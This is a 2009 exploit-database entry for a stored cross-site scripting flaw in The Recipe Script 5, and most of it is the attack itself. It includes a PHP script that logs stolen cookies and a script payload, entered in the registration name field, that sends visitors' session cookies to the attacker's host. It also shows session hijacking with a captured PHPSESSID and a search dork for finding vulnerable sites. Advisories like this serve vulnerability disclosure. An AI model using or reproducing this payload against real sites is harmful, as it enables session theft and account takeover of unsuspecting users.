The Recipe Script 5 - Cross-Site Scripting

EDB-ID:

8967

CVE:





Platform:

PHP

Date:

2009-06-15


#################################################################################################################
[+] The Recipe Script version 5 Cookie Grabber Exploit
[+] Discovered By ThE g0bL!N
[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) )
[+] Vendor:http://recipescript.com/
[+] Dork"script by RECIPE SCRIPT"
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php  - > Put in this File That Code:
 <?php
 $cookie = $_GET['cookie'];
 $log = fopen("log.txt", "a");
 fwrite($log, $cookie ."\n");
 fclose($log);
 ?>
[+]log.txt   - > CHMOD it 777 and put in the same directory with cookie.php
 
[+]Exploit:
   -------
           1)First Register in the site  In Fisrt Name:  Put That code
           2) <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
           3)Then After Complete Registration Go to add_recipe.php To add recipe
           4)Add a normal Recipe
           5) The Victim Open page of recipes recipes.php
           6)The js code Worked 
Example
-------
Result:
------
 PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
 Then we put that code
 javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";
 After That you see :
 ThE g0bL!N
 Profile
 Log off
################################################################################################################

# milw0rm.com [2009-06-15]